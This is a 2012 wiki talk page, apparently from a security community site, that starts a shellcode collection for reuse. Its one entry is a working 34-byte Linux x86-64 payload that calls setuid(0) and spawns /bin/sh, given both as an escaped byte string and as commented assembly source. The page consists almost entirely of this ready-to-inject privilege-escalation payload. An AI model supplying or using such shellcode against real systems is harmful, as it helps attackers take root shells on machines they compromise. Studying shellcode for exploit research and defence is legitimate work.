
Category talk:Shellcode

From NetSec
Revision as of 03:27, 19 August 2012 by LashawnSeccombe (Talk | contribs) (Linux)


Hey guys, thought we could use some collections of this stuff for re-use purposes. Let's only contribute things we wrote ourselves; no copy-pasting others' code, please! Hatter 05:23, 19 August 2012 (MSK)

Collections

This page needs shellcodes and will be updated with them shortly.

Thanks for your patience.

Windows

Linux

64-bit

setuid(0); execve('/bin/sh'); - 34 bytes

Hatter 05:27, 19 August 2012 (MSK)

  • \x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05
 
# Readable source for the sequence. The 34-byte string above is a NUL-free
# re-encoding of the same setuid + execve calls (xor/push/pop instead of
# mov $imm, which assembles with 0x00 bytes), with the trailing exit stub dropped.
.section .data
.section .text
.globl _start
_start:
    # setuid(0): %rax = 105 (SYS_setuid), %rdi = uid
    mov $0, %rdi
    mov $105, %rax
    syscall

    # Linux x86-64 syscall convention: number in %rax, arguments in
    # %rdi, %rsi, %rdx (then %r10, %r8, %r9), so f(%rdi, %rsi, %rdx).
    # execve(filename, argv, envp): %rax = 59 (SYS_execve)
    mov $59, %rax
    push $0x00                     # one NULL qword on the stack
    mov %rsp, %rsi                 # argv points at that NULL (empty argv)
    mov %rsp, %rdx                 # envp points at the same NULL (empty envp)
    mov $0x0068732f6e69622f, %rcx  # "/bin/sh\0" as a little-endian qword
    push %rcx
    mov %rsp, %rdi                 # filename is '/bin/sh\0'
    syscall

    # exit(0): %rax = 60 (SYS_exit); only reached if execve fails
    mov $60, %rax
    mov $0, %rdi
    syscall